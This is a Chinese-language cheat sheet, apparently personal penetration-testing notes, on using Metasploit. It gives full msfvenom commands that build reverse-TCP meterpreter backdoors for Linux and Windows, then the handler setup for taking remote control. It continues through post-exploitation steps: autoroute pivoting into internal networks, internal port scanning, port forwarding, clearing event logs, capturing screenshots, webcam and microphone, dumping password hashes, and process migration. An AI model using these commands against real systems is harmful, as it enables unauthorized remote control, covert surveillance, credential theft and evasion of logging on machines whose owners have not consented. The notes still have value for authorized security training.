0x034 MSF
-
启动msf msfconsole
-
先启动msf依赖的postgresql数据库
- 初始化数据库 msfdb init (要用普通用户)
-
-
msf路径 /usr/share
-
制作后门 msfvenom
-
msfvenom -p payload脚本 lhost=监听/攻击机ip lport=端口 -f 文件类型 -o 文件名
-
linux示例
- msfvenom -p linux/x64/meterpreter/reverse_tcp lhost 192.168.223.129 lport=4444 -f elf -o shell
-
windows示例
- msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.223.129 lport=4444 -f exe -o shell.exe
-
-
远控流程
-
连接后门
-
1.制作后门上传到目标机并运行
- 详见上一条
-
2.开启msf并进入handle模块
- use exploit/multi/handler
-
3.设置payload类型(必须与第一步一致)
- set payload payload名字
-
4.设置lhost和lport(与第一步生成的后门一致)
- set lhost 监听ip
- set lport 监听端口
-
5.options查看配置是否正确
-
6.run运行
-
进入meterpreter控制终端
-
执行shell可进入目标机终端
-
run可执行自带脚本或post模块
- 自带脚本文件在/usr/share/metasploit-framework/script
- post模块在/usr/share/metasploit-framework/modules/post
-
-
-
bg将进程放到后台,sessions查看,sessions 进程id 返回到进程
-
-
添加内网路由
(被控制的目标机只能访问外网不能访问内网,给它添加路由以访问内网)- 1.连接上shell之后运行脚本 run get_local_subnets
- 2.run autoroute -s 内网网段 #例如192.168.223.0/24
- 3.run autoroute -p
-
内网扫描
-
1.用bg把进程放到后台,打开扫描端口模块
- use auxiliary/scanner/portscan/tcp
-
2.设置主机段
- set rhosts 内网网段 (和上一小节一样)
-
3.设置扫描端口
- set ports 端口1,端口2
-
4.设置线程
- set threads 线程数
-
5.run 执行脚本
-
back 退出当前模块
-
-
端口转发
- Portfwd
-
常用命令
-
核心命令
-
bg
-
sessions
-
load
- 和use一样
-
run
-
-
文件操作
- cat
- cd
- cp
- dir
- download
- upload
- ls
- ps
- search
-
网络命令
- if/ipcondig
- netstat
- portfwd
- getproxy
-
系统命令
- clearev
- kill
- shell
- powershell
- sysinfo
-
用户界面命令
- screenshot
-
其他
-
摄像头
-
麦克风
- 密码哈希
-
-
-
-
进程注入
- migrate 被注入的进程号
-